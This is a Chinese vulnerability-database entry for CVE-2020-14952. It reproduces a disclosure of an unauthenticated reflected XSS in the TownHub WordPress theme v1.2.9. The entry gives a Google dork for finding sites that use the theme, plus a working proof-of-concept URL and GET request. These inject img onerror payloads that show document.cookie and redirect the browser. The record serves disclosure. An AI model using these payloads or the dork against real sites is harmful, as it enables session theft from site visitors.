漏洞ID | 11546 | 漏洞类型 | |
发布时间 | 2020-06-22 | 更新时间 | 2020-06-22 |
![]() | CVE-2020-14952 | ![]() | N/A |
漏洞平台 | N/A | CVSS评分 | N/A |
漏洞来源
TownHub - Directory & Listing WordPress Theme v1.2.9
官方跳转
漏洞详情
漏洞细节尚未披露
漏洞EXP
[+] Exploit Title: TownHub - Directory & Listing WordPress Theme v1.2.9 - Unauthenticated Reflected XSS
[+] Google Dork: inurl:/wp-content/themes/townhub/
[+] Date: 2020-06-17
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: CTHthemes [ https://cththemes.com ]
[+] Software Version: 1.2.9
[+] Software Link: https://themeforest.net/item/townhub-directory-listing-wordpress-theme/25019571
[+] Tested on: Debian 10
[+] CVE: CVE-2020-14952
[+] CWE: CWE-79
### [ PoC: ]
[!] https://townhub.cththemes.com/?search_term=&location_search=%22%3E%3Cimg%20src=x%20onerror=alert(`VL%CE%9BDV%CE%9ECTOR`)%3E&distance=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E&nearby=&address_lat=%22%3E%3Cimg%20src=x%20onerror=alert(document.cookie)%3E&address_lng=%22%3E%3Cimg%20src=x%20onerror=alert(`PoC`);window.location=`https://twitter.com/vlad_vector`;%3E&lcats[]=195
[!] GET /?search_term=&location_search=%22%3E%3Cimg%20src=x%20onerror=alert(`VL%CE%9BDV%CE%9ECTOR`)%3E&distance=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E&nearby=&address_lat=%22%3E%3Cimg%20src=x%20onerror=alert(document.cookie)%3E&address_lng=%22%3E%3Cimg%20src=x%20onerror=alert(`PoC`);window.location=`https://twitter.com/vlad_vector`;%3E&lcats[]=195 HTTP/1.1
Host: townhub.cththemes.com
### [ Contacts: ]
[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector